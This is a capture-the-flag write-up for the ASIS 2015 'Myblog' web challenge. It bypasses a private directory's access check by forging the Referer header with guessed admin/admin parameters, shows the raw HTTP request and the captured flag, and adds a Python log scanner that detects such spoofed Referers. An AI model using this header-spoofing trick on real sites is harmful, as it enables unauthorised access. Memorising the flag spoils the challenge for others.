ASIS 2015 Finals: Myblog (web150)


This challenge was solved, and the write-up was written, by one of my teammates, nguyen.

http://myblog.asis-ctf.ir:8088/robots.txt

User-agent: *
Disallow: /myblog_private_dir3ct0ry

Through the printing feature you can see the page by sending the correct Referer header:

Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/

GET /printpage.php?id=2417648298 HTTP/1.1
Host: myblog.asis-ctf.ir:8088
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&password=admin
Connection: keep-alive

After some combinations of common param names, I decided to send them all:

Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&password=admin&login=admin&user=admin

And I got this PDF, which has the flag:

ASIS{9c846eab5200c267cb593437780caa4d}
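
A defender-side view of the same pattern, as an added example that is not part of the original write-up: it scans combined-format access logs for requests whose Referer claims a path that robots.txt disallows, and raises the severity when the Referer query carries credential-like parameters. The log lines, client address, parameter-name list and severity labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed list of credential-like parameter names (the four tried in the write-up).
CRED_PARAMS = {"username", "user", "login", "password"}
# Apache/nginx "combined" format: client, request line, status, size, referer, user agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "([^"]*)" "[^"]*"$')

def disallowed_paths(robots_txt):
    """Return the non-empty Disallow prefixes from a robots.txt body."""
    paths = []
    for line in robots_txt.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths

def scan(log_lines, robots_txt):
    """Flag requests whose Referer claims a robots.txt-disallowed path."""
    prefixes = disallowed_paths(robots_txt)
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, target, referer = m.groups()
        ref = urlsplit(referer)
        if not any(ref.path.startswith(p) for p in prefixes):
            continue
        creds = sorted(CRED_PARAMS & set(parse_qs(ref.query, keep_blank_values=True)))
        findings.append({"client": client, "target": target, "referer_path": ref.path,
                         "cred_params": creds, "severity": "high" if creds else "medium"})
    return findings

# Constructed sample input; 203.0.113.5 is a documentation-range address.
ROBOTS = "User-agent: *\nDisallow: /myblog_private_dir3ct0ry\n"
BASE = "http://myblog.asis-ctf.ir:8088"
PRIV = BASE + "/myblog_private_dir3ct0ry"

def _line(referer):
    return ('203.0.113.5 - - [10/Oct/2015:12:00:01 +0000] '
            f'"GET /printpage.php?id=2417648298 HTTP/1.1" 200 5120 "{referer}" "Mozilla/5.0"')

LOG = [_line(BASE + "/index.php"), _line(PRIV + "/"), _line("-"),
       _line(PRIV + "/?username=admin&password=admin&login=admin&user=admin")]

if __name__ == "__main__":
    for finding in scan(LOG, ROBOTS):
        print(finding)
```

The Referer header is entirely client-controlled, so a hit here indicates a request worth reviewing rather than proof of where the client actually navigated from.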
